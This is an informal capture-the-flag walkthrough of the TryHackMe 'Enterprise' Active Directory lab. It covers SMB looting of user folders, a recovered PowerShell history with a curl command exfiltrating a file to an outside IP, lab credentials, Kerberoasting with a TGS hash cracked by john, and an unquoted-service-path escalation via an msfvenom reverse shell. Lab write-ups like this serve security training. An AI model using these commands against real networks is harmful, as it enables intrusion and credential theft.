tryhackme // 2026-01-07 // ID: REF-Enterprise

Enterprise


PORT     STATE SERVICE       REASON          VERSION
53/tcp   open  domain        syn-ack ttl 126 Simple DNS Plus
80/tcp   open  http          syn-ack ttl 126 Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Site doesn't have a title (text/html).
| http-methods: 
|   Supported Methods: OPTIONS TRACE GET HEAD POST
|_  Potentially risky methods: TRACE
88/tcp   open  kerberos-sec  syn-ack ttl 126 Microsoft Windows Kerberos (server time: 2025-12-31 20:51:41Z)
135/tcp  open  msrpc         syn-ack ttl 126 Microsoft Windows RPC
139/tcp  open  netbios-ssn   syn-ack ttl 126 Microsoft Windows netbios-ssn
389/tcp  open  ldap          syn-ack ttl 126 Microsoft Windows Active Directory LDAP (Domain: ENTERPRISE.THM0., Site: Default-First-Site-Name)
445/tcp  open  microsoft-ds? syn-ack ttl 126
464/tcp  open  kpasswd5?     syn-ack ttl 126
593/tcp  open  ncacn_http    syn-ack ttl 126 Microsoft Windows RPC over HTTP 1.0
636/tcp  open  tcpwrapped    syn-ack ttl 126
3268/tcp open  ldap          syn-ack ttl 126 Microsoft Windows Active Directory LDAP (Domain: ENTERPRISE.THM0., Site: Default-First-Site-Name)
3269/tcp open  tcpwrapped    syn-ack ttl 126
3389/tcp open  ms-wbt-server syn-ack ttl 126 Microsoft Terminal Services
| ssl-cert: Subject: commonName=LAB-DC.LAB.ENTERPRISE.THM
| Issuer: commonName=LAB-DC.LAB.ENTERPRISE.THM
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2025-12-30T20:49:03
| Not valid after:  2026-07-01T20:49:03
| MD5:   774b:9238:b813:dcb1:20c5:de8c:7f8b:7bd7
| SHA-1: 5b6e:843c:05c3:4f94:c622:61c5:5cff:e6f8:1c2f:dd31
| -----BEGIN CERTIFICATE-----
| MIIC9jCCAd6gAwIBAgIQdMMKAAyAcp5J5RuGaZNWnDANBgkqhkiG9w0BAQsFADAk
| MSIwIAYDVQQDExlMQUItREMuTEFCLkVOVEVSUFJJU0UuVEhNMB4XDTI1MTIzMDIw
| NDkwM1oXDTI2MDcwMTIwNDkwM1owJDEiMCAGA1UEAxMZTEFCLURDLkxBQi5FTlRF
| UlBSSVNFLlRITTCCASIwDQYJKoZIhvcNAQEBBQADggEPADCCAQoCggEBALp5DJxa
| C8Cx8Wdg8BPzP2Py4YYG4WEJU1MdzUdOORSmZAqzKLRQ3i0F87M5K06fKXum2h2i
| u67xRqFy5K1H2GZqfqy70Rpn4PJbuNCoLApNJIhUWHXn/9e61ekOU/lNNb5Iwsg4
| 3l7GSnEJwiX4x02Qm1zoKwhQYOC2N5AwXoyyMV428hSrCSqwH2DhUnSFXnrltgdb
| 9NXO7vEk/n0DkORFkrEh7zehKrIu6by7QcEBKuE1/0eBDYfqfdBCBFf+6HIpqGph
| a03lQULb8/hXKt7crmXyUqVIzIIEL1FxtocFzqOtBGVrTg2yfRYX8leaLA4Q6M8z
| TzFbzRCBIum9yRUCAwEAAaMkMCIwEwYDVR0lBAwwCgYIKwYBBQUHAwEwCwYDVR0P
| BAQDAgQwMA0GCSqGSIb3DQEBCwUAA4IBAQB0ne66ItJoBv0JSU5kYQ21B8fx626j
| 7tgjgZJaberFnlYoohpAqDSiCj65JStgTUTl0qp/CXS2fBPJC5j/UE9tdionsr2B
| kQ+yQAT8wmsemiWQNQy2PhjzqUO9vAECGV9FDI8CwVln+j6nVltAh38SgPNZidet
| XfnoPgHCY6K/qO/nYN2ktACXr/OsNTRuGuMx6bronXyDmtIjS3By5nexugnAryNV
| NSfdnzm6NSzBIH/AiB5PTxD5tycMW2/ilF2vluItudSjC3/7VKF99HGUZYpzxABC
| 2MxMEYmKDbnUwXVqGncMbGMpCtoN/aEOdNnTNi8tTBiDE/HNpdZj6zfZ
|_-----END CERTIFICATE-----
| rdp-ntlm-info: 
|   Target_Name: LAB-ENTERPRISE
|   NetBIOS_Domain_Name: LAB-ENTERPRISE
|   NetBIOS_Computer_Name: LAB-DC
|   DNS_Domain_Name: LAB.ENTERPRISE.THM
|   DNS_Computer_Name: LAB-DC.LAB.ENTERPRISE.THM
|   DNS_Tree_Name: ENTERPRISE.THM
|   Product_Version: 10.0.17763
|_  System_Time: 2025-12-31T20:52:07+00:00
|_ssl-date: 2025-12-31T20:52:17+00:00; +1s from scanner time.
5985/tcp open  http          syn-ack ttl 126 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
Service Info: Host: LAB-DC; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-time: 
|   date: 2025-12-31T20:52:10
|_  start_date: N/A
|_clock-skew: mean: 0s, deviation: 0s, median: 0s
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled and required
| p2p-conficker: 
|   Checking for Conficker.C or higher...
|   Check 1 (port 49749/tcp): CLEAN (Couldn't connect)
|   Check 2 (port 57603/tcp): CLEAN (Couldn't connect)
|   Check 3 (port 12565/udp): CLEAN (Failed to receive data)
|   Check 4 (port 28463/udp): CLEAN (Timeout)
|_  0/4 checks are positive: Host is CLEAN or ports are blocked
10.64.146.225 enterprice.thm lab.enterprice.thm lab-dc.enterprice.thm
└─$ smbclient \\\\10.64.146.225\\Users
Password for [WORKGROUP\kali]:
Try "help" to get a list of possible commands.
smb: \> passive
passive: command not found
smb: \> ls
  .                                  DR        0  Thu Mar 11 21:11:49 2021
  ..                                 DR        0  Thu Mar 11 21:11:49 2021
  Administrator                       D        0  Thu Mar 11 16:55:48 2021
  All Users                       DHSrn        0  Sat Sep 15 03:28:48 2018
  atlbitbucket                        D        0  Thu Mar 11 17:53:06 2021
  bitbucket                           D        0  Thu Mar 11 21:11:51 2021
  Default                           DHR        0  Thu Mar 11 19:18:03 2021
  Default User                    DHSrn        0  Sat Sep 15 03:28:48 2018
  desktop.ini                       AHS      174  Sat Sep 15 03:16:48 2018
  LAB-ADMIN                           D        0  Thu Mar 11 19:28:14 2021
  Public                             DR        0  Thu Mar 11 16:27:02 2021

to get all data include that smb use special cmds

smbclient \\\\10.64.146.225\\Users
Password for [WORKGROUP\kali]:
Try "help" to get a list of possible commands.
smb: \> lcd /home/kali/tryhackme/enterprice
smb: \> recurse ON
smb: \> prompt OFF
smb: \> mget *
getting file \desktop.ini of size 174 as desktop.ini (0.1 KiloBytes/sec) (average 0.1 KiloBytes/sec)
NT_STATUS_ACCESS_DENIED listing \Administrator\*

after got all data from smb my file dir look like this

└─$ tree                                                                                                                                    
.
├── Administrator
├── All Users
├── atlbitbucket
├── bitbucket
├── Default
   ├── AppData
      ├── Local
         ├── Application Data
         ├── History
         ├── Microsoft
            ├── InputPersonalization
               └── TrainedDataStore
            ├── Windows
               ├── CloudStore
               ├── GameExplorer
               ├── History
               ├── INetCache
               ├── INetCookies
               ├── Shell
                  └── DefaultLayouts.xml
               ├── Temporary Internet Files
               └── WinX
                   ├── Group1
                      ├── 1 - Desktop.lnk
                      └── desktop.ini
                   ├── Group2
                      ├── 1 - Run.lnk
                      ├── 2 - Search.lnk
                      ├── 3 - Windows Explorer.lnk
                      ├── 4 - Control Panel.lnk
                      ├── 5 - Task Manager.lnk
                      └── desktop.ini
                   └── Group3
                       ├── 01a - Windows PowerShell.lnk
                       ├── 01 - Command Prompt.lnk
                       ├── 02a - Windows PowerShell.lnk
                       ├── 02 - Command Prompt.lnk
                       ├── 03 - Computer Management.lnk
                       ├── 04-1 - NetworkStatus.lnk
                       ├── 04 - Disk Management.lnk
                       ├── 05 - Device Manager.lnk
                       ├── 06 - SystemAbout.lnk
                       ├── 07 - Event Viewer.lnk
                       ├── 08 - PowerAndSleep.lnk
                       ├── 09 - Mobility Center.lnk
                       ├── 10 - AppsAndFeatures.lnk
                       └── desktop.ini
            ├── WindowsApps
            └── Windows Sidebar
                ├── Gadgets
                └── settings.ini
         ├── Temp
         └── Temporary Internet Files
      └── Roaming
          └── Microsoft
              ├── Internet Explorer
                 └── Quick Launch
                     ├── Control Panel.lnk
                     ├── desktop.ini
                     ├── Server Manager.lnk
                     ├── Shows Desktop.lnk
                     └── Window Switcher.lnk
              └── Windows
                  ├── CloudStore
                  ├── Network Shortcuts
                  ├── Powershell
                  ├── Printer Shortcuts
                  ├── Recent
                  ├── SendTo
                     ├── Compressed (zipped) Folder.ZFSendToTarget
                     ├── Desktop (create shortcut).DeskLink
                     ├── Desktop.ini
                     └── Mail Recipient.MAPIMail
                  ├── Start Menu
                     └── Programs
                         ├── Accessibility
                            ├── desktop.ini
                            ├── Magnify.lnk
                            ├── Narrator.lnk
                            └── On-Screen Keyboard.lnk
                         ├── Accessories
                            ├── desktop.ini
                            └── Notepad.lnk
                         ├── Maintenance
                            └── Desktop.ini
                         ├── Startup
                            └── RunWallpaperSetupInit.cmd
                         ├── System Tools
                            ├── Administrative Tools.lnk
                            ├── Command Prompt.lnk
                            ├── computer.lnk
                            ├── Control Panel.lnk
                            ├── Desktop.ini
                            ├── File Explorer.lnk
                            └── Run.lnk
                         └── Windows PowerShell
                  └── Templates
   ├── Application Data
   ├── Cookies
   ├── Desktop
   ├── Documents
      ├── My Music
      ├── My Pictures
      └── My Videos
   ├── Downloads
   ├── Favorites
   ├── Links
   ├── Local Settings
   ├── Music
   ├── My Documents
   ├── NetHood
   ├── Pictures
   ├── PrintHood
   ├── Recent
   ├── Saved Games
   ├── SendTo
   ├── Start Menu
   ├── Templates
   └── Videos
├── Default User
├── desktop.ini
├── LAB-ADMIN
   ├── AppData
      ├── Local
         ├── Microsoft
            ├── Credentials
               └── DFBE70A7E5CC19A398EBF1B96859CE5D
            ├── InputPersonalization
               └── TrainedDataStore
            ├── Windows
               ├── CloudStore
               ├── GameExplorer
               ├── History
               ├── INetCache
               ├── INetCookies
               ├── Shell
                  └── DefaultLayouts.xml
               ├── UsrClass.dat{3aac7186-82b4-11eb-a88a-000c29379b0a}.TM.blf
               ├── UsrClass.dat{3aac7186-82b4-11eb-a88a-000c29379b0a}.TMContainer00000000000000000001.regtrans-ms
               ├── UsrClass.dat{3aac7186-82b4-11eb-a88a-000c29379b0a}.TMContainer00000000000000000002.regtrans-ms
               └── WinX
                   ├── Group1
                      ├── 1 - Desktop.lnk
                      └── desktop.ini
                   ├── Group2
                      ├── 1 - Run.lnk
                      ├── 2 - Search.lnk
                      ├── 3 - Windows Explorer.lnk
                      ├── 4 - Control Panel.lnk
                      ├── 5 - Task Manager.lnk
                      └── desktop.ini
                   └── Group3
                       ├── 01a - Windows PowerShell.lnk
                       ├── 01 - Command Prompt.lnk
                       ├── 02a - Windows PowerShell.lnk
                       ├── 02 - Command Prompt.lnk
                       ├── 03 - Computer Management.lnk
                       ├── 04-1 - NetworkStatus.lnk
                       ├── 04 - Disk Management.lnk
                       ├── 05 - Device Manager.lnk
                       ├── 06 - SystemAbout.lnk
                       ├── 07 - Event Viewer.lnk
                       ├── 08 - PowerAndSleep.lnk
                       ├── 09 - Mobility Center.lnk
                       ├── 10 - AppsAndFeatures.lnk
                       └── desktop.ini
            ├── WindowsApps
            └── Windows Sidebar
                ├── Gadgets
                └── settings.ini
         └── Temp
      └── Roaming
          └── Microsoft
              ├── Credentials
              ├── Crypto
                 └── RSA
                     └── S-1-5-21-2168718921-3906202695-65158103-1000
                         └── 83aa4cc77f591dfc2374580bbd95f6ba_baebb989-4cb7-4d0b-89c2-ad186800b0f6
              ├── Internet Explorer
                 └── Quick Launch
                     ├── Control Panel.lnk
                     ├── desktop.ini
                     ├── Server Manager.lnk
                     ├── Shows Desktop.lnk
                     └── Window Switcher.lnk
              ├── Protect
                 ├── CREDHIST
                 └── S-1-5-21-2168718921-3906202695-65158103-1000
                     ├── 655a0446-8420-431a-a5d7-2d18eb87b9c3
                     └── Preferred
              ├── SystemCertificates
                 └── My
                     ├── AppContainerUserCertRead
                     ├── Certificates
                     ├── CRLs
                     └── CTLs
              └── Windows
                  ├── CloudStore
                  ├── Network Shortcuts
                  ├── Powershell
                     └── PSReadline
                         └── Consolehost_hisory.txt
                  ├── Printer Shortcuts
                  ├── Recent
                  ├── SendTo
                     ├── Compressed (zipped) Folder.ZFSendToTarget
                     ├── Desktop (create shortcut).DeskLink
                     ├── Desktop.ini
                     └── Mail Recipient.MAPIMail
                  ├── Start Menu
                     └── Programs
                         ├── Accessibility
                            ├── Desktop.ini
                            ├── Magnify.lnk
                            ├── Narrator.lnk
                            └── On-Screen Keyboard.lnk
                         ├── Accessories
                            ├── desktop.ini
                            └── Notepad.lnk
                         ├── Maintenance
                            └── Desktop.ini
                         ├── System Tools
                            ├── Administrative Tools.lnk
                            ├── Command Prompt.lnk
                            ├── computer.lnk
                            ├── Control Panel.lnk
                            ├── Desktop.ini
                            ├── File Explorer.lnk
                            └── Run.lnk
                         └── Windows PowerShell
                             ├── desktop.ini
                             ├── Windows PowerShell ISE.lnk
                             ├── Windows PowerShell ISE (x86).lnk
                             ├── Windows PowerShell.lnk
                             └── Windows PowerShell (x86).lnk
                  └── Templates
   ├── Desktop
   ├── Documents
   ├── Downloads
   ├── Favorites
   ├── Links
   ├── Music
   ├── Pictures
   ├── Saved Games
   └── Videos
└── Public

136 directories, 111 files

Found something

cat Consolehost_hisory.txt
cd C:\
mkdir monkey
cd monkey
cd ..
cd ..
cd ..
cd D:
cd D:
cd D:
D:\
mkdir temp
cd temp
echo "replication:101RepAdmin123!!">private.txt
Invoke-WebRequest -Uri http://1.215.10.99/payment-details.txt
more payment-details.txt
curl -X POST -H 'Cotent-Type: ascii/text' -d .\private.txt' http://1.215.10.99/dropper.php?file=itsdone.txt
del private.txt
del payment-details.txt
cd ..
del temp
cd C:\
C:\
exit                                                                                                                                         
The user `LAB-ADMIN` was creating a text file containing credentials.

- **Potential User:** `replication` (or possibly `LAB-ADMIN` reusing the password)

- **Potential Password:** `101RepAdmin123!!`
smbclient //10.64.146.225/Users -U "LAB-ADMIN"
Password for [WORKGROUP\LAB-ADMIN]:
Try "help" to get a list of possible commands.
smb: \> ls
  .                                  DR        0  Thu Mar 11 21:11:49 2021
  ..                                 DR        0  Thu Mar 11 21:11:49 2021
  Administrator                       D        0  Thu Mar 11 16:55:48 2021
  All Users                       DHSrn        0  Sat Sep 15 03:28:48 2018
  atlbitbucket                        D        0  Thu Mar 11 17:53:06 2021
  bitbucket                           D        0  Thu Mar 11 21:11:51 2021
  Default                           DHR        0  Thu Mar 11 19:18:03 2021
  Default User                    DHSrn        0  Sat Sep 15 03:28:48 2018
  desktop.ini                       AHS      174  Sat Sep 15 03:16:48 2018
  LAB-ADMIN                           D        0  Thu Mar 11 19:28:14 2021
  Public                             DR        0  Thu Mar 11 16:27:02 2021

                15587583 blocks of size 4096. 9929808 blocks available

smb: \LAB-ADMIN\> lcd /home/kali/tryhackme/enterprice/labadmin
smb: \LAB-ADMIN\> recurse ON
smb: \LAB-ADMIN\> prompt OFF
smb: \LAB-ADMIN\> mget *

└─$ tree                                                                                                                                    
.
├── AppData
   ├── Local
      ├── Microsoft
         ├── Credentials
            └── DFBE70A7E5CC19A398EBF1B96859CE5D
         ├── InputPersonalization
            └── TrainedDataStore
         ├── Windows
            ├── CloudStore
            ├── GameExplorer
            ├── History
            ├── INetCache
            ├── INetCookies
            ├── Shell
               └── DefaultLayouts.xml
            ├── UsrClass.dat{3aac7186-82b4-11eb-a88a-000c29379b0a}.TM.blf
            ├── UsrClass.dat{3aac7186-82b4-11eb-a88a-000c29379b0a}.TMContainer00000000000000000001.regtrans-ms
            ├── UsrClass.dat{3aac7186-82b4-11eb-a88a-000c29379b0a}.TMContainer00000000000000000002.regtrans-ms
            └── WinX
                ├── Group1
                   ├── 1 - Desktop.lnk
                   └── desktop.ini
                ├── Group2
                   ├── 1 - Run.lnk
                   ├── 2 - Search.lnk
                   ├── 3 - Windows Explorer.lnk
                   ├── 4 - Control Panel.lnk
                   ├── 5 - Task Manager.lnk
                   └── desktop.ini
                └── Group3
                    ├── 01a - Windows PowerShell.lnk
                    ├── 01 - Command Prompt.lnk
                    ├── 02a - Windows PowerShell.lnk
                    ├── 02 - Command Prompt.lnk
                    ├── 03 - Computer Management.lnk
                    ├── 04-1 - NetworkStatus.lnk
                    ├── 04 - Disk Management.lnk
                    ├── 05 - Device Manager.lnk
                    ├── 06 - SystemAbout.lnk
                    ├── 07 - Event Viewer.lnk
                    ├── 08 - PowerAndSleep.lnk
                    ├── 09 - Mobility Center.lnk
                    ├── 10 - AppsAndFeatures.lnk
                    └── desktop.ini
         ├── WindowsApps
         └── Windows Sidebar
             ├── Gadgets
             └── settings.ini
      └── Temp
   └── Roaming
       └── Microsoft
           ├── Credentials
           ├── Crypto
              └── RSA
                  └── S-1-5-21-2168718921-3906202695-65158103-1000
                      └── 83aa4cc77f591dfc2374580bbd95f6ba_baebb989-4cb7-4d0b-89c2-ad186800b0f6
           ├── Internet Explorer
              └── Quick Launch
                  ├── Control Panel.lnk
                  ├── desktop.ini
                  ├── Server Manager.lnk
                  ├── Shows Desktop.lnk
                  └── Window Switcher.lnk
           ├── Protect
              ├── CREDHIST
              └── S-1-5-21-2168718921-3906202695-65158103-1000
                  ├── 655a0446-8420-431a-a5d7-2d18eb87b9c3
                  └── Preferred
           ├── SystemCertificates
              └── My
                  ├── AppContainerUserCertRead
                  ├── Certificates
                  ├── CRLs
                  └── CTLs
           └── Windows
               ├── CloudStore
               ├── Network Shortcuts
               ├── Powershell
                  └── PSReadline
                      └── Consolehost_hisory.txt
               ├── Printer Shortcuts
               ├── Recent
               ├── SendTo
                  ├── Compressed (zipped) Folder.ZFSendToTarget
                  ├── Desktop (create shortcut).DeskLink
                  ├── Desktop.ini
                  └── Mail Recipient.MAPIMail
               ├── Start Menu
                  └── Programs
                      ├── Accessibility
                         ├── Desktop.ini
                         ├── Magnify.lnk
                         ├── Narrator.lnk
                         └── On-Screen Keyboard.lnk
                      ├── Accessories
                         ├── desktop.ini
                         └── Notepad.lnk
                      ├── Maintenance
                         └── Desktop.ini
                      ├── System Tools
                         ├── Administrative Tools.lnk
                         ├── Command Prompt.lnk
                         ├── computer.lnk
                         ├── Control Panel.lnk
                         ├── Desktop.ini
                         ├── File Explorer.lnk
                         └── Run.lnk
                      └── Windows PowerShell
                          ├── desktop.ini
                          ├── Windows PowerShell ISE.lnk
                          ├── Windows PowerShell ISE (x86).lnk
                          ├── Windows PowerShell.lnk
                          └── Windows PowerShell (x86).lnk
               └── Templates
├── Desktop
├── Documents
├── Downloads
├── Favorites
├── Links
├── Music
├── Pictures
├── Saved Games
└── Videos

62 directories, 62 files

so nothing usefull , to be a usefull i use kerbrute to find usernames


I again scan all ports using nmap and find something

7990/tcp open  http    Microsoft IIS httpd 10.0
|_http-title: Log in to continue - Log in with Atlassian account
|_http-server-header: Microsoft-IIS/10.0
| http-methods: 
|_  Potentially risky methods: TRACE
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

this 7990 port website login page telling Reminder to all Enterprise-THM Employees: We are moving to Github! So I dork google againest github site:github.com ""Enterprise-THM"
So there is git repo also belong to room creator

so in that repo has some user and that user have repo and that repo history commit give something valuble info

Import-Module ActiveDirectory
$userName = 'nik'
$userPassword = 'ToastyBoi!'
$psCreds = ConvertTo-SecureString $userPassword -AsPlainText -Force
$Computers = New-Object -TypeName "System.Collections.ArrayList"
$Computer = $(Get-ADComputer -Filter * | Select-Object Name)
for ($index = -1; $index -lt $Computer.count; $index++) { Invoke-Command -ComputerName $index {systeminfo} }

have a valid domain creds, enumerate basic info using rcpclient

└─$ rpcclient 10.64.146.225 -U nik     
Password for [WORKGROUP\nik]:
rpcclient $> enumdomusers
user:[Administrator] rid:[0x1f4]
user:[Guest] rid:[0x1f5]
user:[krbtgt] rid:[0x1f6]
user:[atlbitbucket] rid:[0x3e8]
user:[bitbucket] rid:[0x452]
user:[nik] rid:[0x453]
user:[replication] rid:[0x454]
user:[spooks] rid:[0x455]
user:[korone] rid:[0x456]
user:[banana] rid:[0x457]
user:[Cake] rid:[0x458]
user:[contractor-temp] rid:[0x45c]
user:[varg] rid:[0x45d]
user:[joiner] rid:[0x45f]
rpcclient $> enumdomgroups
group:[Domain Admins] rid:[0x200]
group:[Domain Users] rid:[0x201]
group:[Domain Guests] rid:[0x202]
group:[Domain Computers] rid:[0x203]
group:[Domain Controllers] rid:[0x204]
group:[Group Policy Creator Owners] rid:[0x208]
group:[Read-only Domain Controllers] rid:[0x209]
group:[Cloneable Domain Controllers] rid:[0x20a]
group:[Protected Users] rid:[0x20d]
group:[Key Admins] rid:[0x20e]
group:[DnsUpdateProxy] rid:[0x44f]
group:[Password-Policy-Exemption] rid:[0x459]
group:[Contractor] rid:[0x45a]
group:[sensitive-account] rid:[0x45b]
group:[adobe-subscription] rid:[0x45e]

using kerbrute and rcpclient i create users list

Administrator
Guest
krbtgt
atlbitbucket
bitbucket
nik
replication
spooks
korone
banana
Cake
contractor-temp
varg
joiner
LAB-ADMIN
└─$ GetUserSPNs.py lab.enterprise.thm/nik:ToastyBoi!
/home/kali/.local/share/pipx/venvs/impacket/lib/python3.13/site-packages/impacket/version.py:12: UserWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html. The pkg_resources package is slated for removal as early as 2025-11-30. Refrain from using this package or pin to Setuptools<81.
  import pkg_resources
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

ServicePrincipalName  Name       MemberOf                                                     PasswordLastSet             LastLogon                   Delegation 
--------------------  ---------  -----------------------------------------------------------  --------------------------  --------------------------  ----------
HTTP/LAB-DC           bitbucket  CN=sensitive-account,CN=Builtin,DC=LAB,DC=ENTERPRISE,DC=THM  2021-03-11 20:20:01.333272  2021-04-26 11:16:41.570158             
└─$ GetUserSPNs.py lab.enterprise.thm/nik:ToastyBoi! -request
/home/kali/.local/share/pipx/venvs/impacket/lib/python3.13/site-packages/impacket/version.py:12: UserWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html. The pkg_resources package is slated for removal as early as 2025-11-30. Refrain from using this package or pin to Setuptools<81.
  import pkg_resources
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

ServicePrincipalName  Name       MemberOf                                                     PasswordLastSet             LastLogon                   Delegation 
--------------------  ---------  -----------------------------------------------------------  --------------------------  --------------------------  ----------
HTTP/LAB-DC           bitbucket  CN=sensitive-account,CN=Builtin,DC=LAB,DC=ENTERPRISE,DC=THM  2021-03-11 20:20:01.333272  2021-04-26 11:16:41.570158             



[-] CCache file is not found. Skipping...
$krb5tgs$23$*bitbucket$LAB.ENTERPRISE.THM$lab.enterprise.thm/bitbucket*$9b0b484bd18f616683947f5543f6b689$7b2161d3a6d9ea143d59e412be15265322a16d9d75400f03e2932b2a1ada41de8d97fb538781b1a346bf429f26da648a9e9a89c5c55854ddb5d2bfc0639b2e5f4eceb495d9ffaa57df2a571c14f3d2cd235aae808b84d5810df91200a7e60956b0e4a9e512434d0255b84a25dcf60ed67f72ac10920d76274e4d948b47e5a8f6518fe067d41e9af961850ab8425512a1d1c4186d700afecb7917a0179158da4498d6c8f0e7f63bdbbdc7106457f3f0ab6f903a02a429eb09e9f1945fc49bd30c1780f954c7c557140794ad5ac3eb3c085e5d8a41494718939a5465f97c3ca62ba45e3ec1e4959341f0996d358110a6fa11fe432cca01172c50c20d82a3420a736ff12f25bded41fc59b800c10819dc60c15f31f5fa22dd2bef8ac8358bf538a90c00168d9157c629b9547c5b83baf089f7bd0082f1bcd246cbfecb661500bfba25c2e8bfe042d27c04746f34aa62faf1fe2c2cb64ce6d7e793bf1a2815d10d84e44528e203e72ad44f93a800e3f4ee576dff0b3ae784c7b82b2f5d7a276c16ed7a153e8dbcc539dd698fe73dfbd3c650d0ae5a18c9a18f7fa0a6ec471da2624c7b1d5f0d2619d7b0ac8c7d510093379dd2bf1c7aad9270741413b63877bb3714f3020463bd3e716dd44d3f996441691800ff8406bfaaefdca4f5ce4fc2d3996aa6ea7e8bbc8c027fe7214b1b7e27c673017ed95dd79420397889a9f9932d7ff0244617a810685d26d7d7a2d895130d4602d95a3f3b280a8949cf7f976f5ba9d11e3e977b3e508e676e9bc036f67bc4bb77894f3d564e4498c2fc3fcc2d6baf6c85abb196e86c5875c31592ecd0d60e....................
└─$ john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt

Using default input encoding: UTF-8
Loaded 1 password hash (krb5tgs, Kerberos 5 TGS etype 23 [MD4 HMAC-MD5 RC4])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
littleredbucket  (?)     
1g 0:00:00:01 DONE (2025-12-31 17:45) 0.8620g/s 1354Kp/s 1354Kc/s 1354KC/s livelifecool..liss4life
Use the "--show" option to display all of the cracked passwords reliably
Session completed. 

now I have credentials i use remmina to login and you have 1st flag

so to get root i put winpease into that found that one service’s binary path has no double quotes.

Create reverse shell using msfvenom and upload into that path and catch reverse shell using msfconsle or netcat you got root flag

THM{1a1fa94875421.......................}